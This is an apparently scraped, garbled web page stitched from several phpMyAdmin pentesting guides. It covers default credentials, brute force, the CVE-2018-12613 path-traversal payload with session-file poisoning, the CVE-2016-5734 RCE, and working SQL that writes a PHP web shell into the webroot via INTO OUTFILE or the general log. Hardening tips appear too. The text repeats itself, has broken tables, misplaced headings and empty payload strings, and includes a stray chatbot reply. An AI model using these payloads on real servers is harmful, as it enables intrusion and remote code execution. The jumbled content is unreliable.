Phpmyadmin Hacktricks Verified Repack

Mastering phpMyAdmin Pentesting: A "HackTricks Verified" Guide

phpMyAdmin is the ubiquitous web interface for managing MySQL and MariaDB databases. Because it sits directly on top of sensitive data, it is a primary target for security researchers and attackers alike. Drawing from the methodologies popularized by resources like HackTricks, this guide outlines the verified techniques for enumerating, exploiting, and securing phpMyAdmin installations. 1. Initial Reconnaissance & Version Fingerprinting

Before launching an attack, you must understand the environment. phpMyAdmin’s vulnerability profile changes drastically between versions.

Version Identification: Look at the footer of the login page or check /README or /Documentation.html.

Default Credentials: Many installations still use root with a blank password or admin / password.

Setup Directory: Check if the /setup/ directory is accessible. If left unconfigured, it can sometimes be used to trick the application into connecting to a remote, malicious database server. 2. Exploiting Authentication

If default credentials fail, the next step is bypassing or forcing entry. Dictionary Attacks

phpMyAdmin does not always have built-in rate limiting. Using tools like Burp Suite Intruder or THC-Hydra, you can perform a dictionary attack against the pma_username and pma_password fields. Information Schema Leakage

In some misconfigured environments, a "config" auth type might be used where the credentials are hardcoded. If you find a way to read config.inc.php (via Local File Inclusion), you gain instant access. 3. Post-Auth Exploitation: From SQL to RCE

Once you have authenticated access (even as a low-privilege user), your goal is to escalate to the underlying operating system. A. SELECT INTO OUTFILE (The Classic Web Shell)

If the MySQL user has the FILE privilege and you know the absolute path of the webroot, you can write a PHP shell directly to the server.

SELECT '' INTO OUTFILE '/var/www/html/shell.php'; Use code with caution. phpmyadmin hacktricks verified

Note: This requires the secure_file_priv variable to be empty or pointing to the webroot. B. CVE-2018-12613 (Local File Inclusion)

One of the most famous "HackTricks verified" vulnerabilities. In versions 4.8.0 through 4.8.1, a flaw in the page redirection logic allowed for LFI.The Payload:index.php?target=db_sql.php%253f/../../../../../../../../etc/passwdAttackers combine this with Session File Poisoning:

Run SELECT ''; to store the shell in your session file. Find your session ID (from the phpMyAdmin cookie).

Use the LFI to include /var/lib/php/sessions/sess_[YOUR_ID]. C. CVE-2016-5734 (RCE via Preg_Replace)

In phpMyAdmin 4.3.0 to 4.6.2, a vulnerability in the search feature allowed attackers to execute code through the PHP preg_replace function using the /e (eval) modifier. 4. Advanced Enumeration: HackTricks Style

If you are stuck within the database, look for these "Quick Wins":

User Table Extraction: Hunt for wp_users (WordPress) or users tables to dump hashes for other services.

Sensitive Configs: Query tables that might store API keys or plaintext credentials for integrated services.

UDF (User Defined Functions): If the server is running on Windows and you have high privileges, you can attempt to drop a DLL to gain OS-level execution. 5. Defensive Hardening (The "Verified" Fixes)

To prevent your server from appearing in a pentester's report, follow these industry standards:

Restrict Access by IP: Never leave phpMyAdmin open to the world. Use .htaccess or Nginx rules to allow only trusted IPs. Exploitation Steps:

Change the Alias: Move the interface from /phpmyadmin to a random string like /secret_db_9921.

Disable Root Login: Force users to login via a non-root account and use sudo-like permissions within MySQL.

Update Religiously: Most RCE exploits target versions that are 5+ years old. Summary Table: phpMyAdmin Attack Vectors Requirement Default Creds Poor Configuration Full DB Access LFI (CVE-2018-12613) Version 4.8.x RCE via Session Poisoning SELECT INTO OUTFILE FILE Privilege + Known Path Setup Script Bypass Accessible /setup/ folder Config Manipulation

7. Arbitrary File Read

phpMyAdmin allows arbitrary file reads when the "open_basedir" restriction is not enabled. An attacker can read sensitive files to extract sensitive information.

Mitigation Steps:

  1. Use Strong Passwords: Use strong passwords for phpMyAdmin accounts.
  2. Enable Two-Factor Authentication: Enable two-factor authentication to add an extra layer of security.
  3. Disable Unauthenticated Access: Disable unauthenticated access to the phpMyAdmin interface.
  4. Enable open_basedir Restriction: Enable the "open_basedir" restriction to prevent LFI attacks.
  5. Disable AllowArbitraryServer Option: Disable the "AllowArbitraryServer" option to prevent SQL injection and code execution attacks.
  6. Use a Web Application Firewall (WAF): Use a WAF to detect and prevent common web attacks.

By following these hacktricks and mitigation steps, you can improve the security of your phpMyAdmin installation and protect against common attacks.

References:

Technical Analysis: phpMyAdmin Exploitation and the HackTricks Methodology This paper explores the security landscape of phpMyAdmin

, a popular web-based MySQL/MariaDB administration tool, through the lens of established penetration testing methodologies like those verified and curated by HackTricks 1. Introduction to phpMyAdmin Vulnerabilities phpMyAdmin

is frequently targeted because its successful compromise often grants an attacker complete control over a website's backend data or, in some cases, the web server itself. Vulnerabilities typically stem from outdated versions, misconfigurations, or weak credentials. 2. High-Impact Exploitation Techniques Verified techniques on HackTricks Exploit-DB highlight critical attack paths: Authenticated Local File Inclusion (LFI):

Specifically affecting versions 4.8.0 and 4.8.1 (CVE-2018-12613), this flaw allows an authenticated user to include and execute local files by exploiting improper page whitelisting. LFI to Remote Code Execution (RCE): HackTricks Verified: On older MySQL

Attackers can escalate LFI to RCE by injecting PHP payloads into the database and including the resulting session file (e.g., /var/lib/php5/sess_ SQL Injection (SQLi):

Vulnerabilities in specific features, such as the user accounts page, have allowed malicious users to inject SQL commands, potentially modifying privileges or exfiltrating data. 3. Enumeration and Reconnaissance

A standard pentesting methodology begins with service identification: Port Scanning: Identifying default ports (usually for MySQL). Version Detection:

Checking for outdated software susceptible to known exploits like CVE-2018-12613 Credential Auditing:

Testing for default or weak credentials which remain a leading cause of compromise. 4. Mitigation and Security Hardening

You're looking for information on phpMyAdmin vulnerabilities and exploits, specifically from HackTricks, a popular platform known for sharing cybersecurity tips and tricks. While I don't have direct access to specific pages or the ability to verify the current status of external content, I can guide you on how to approach this topic and provide some general insights.

B. General Log File Method (When OUTFILE Fails)

If secure_file_priv is set but you can change global variables:

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT "<?php system($_GET['c']); ?>";

Verification: Requires SUPER or ADMIN privilege. Works on MySQL 5.x/8.x if log dir is writable by mysql user.

A. INTO OUTFILE / INTO DUMPFILE

If the database user has FILE privilege and secure_file_priv is empty, write a webshell:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php";

Verification: Check secure_file_priv:

SHOW VARIABLES LIKE "secure_file_priv";

HackTricks Verified: On older MySQL, you can use INTO DUMPFILE for binary shells (e.g., reverse shell ELF).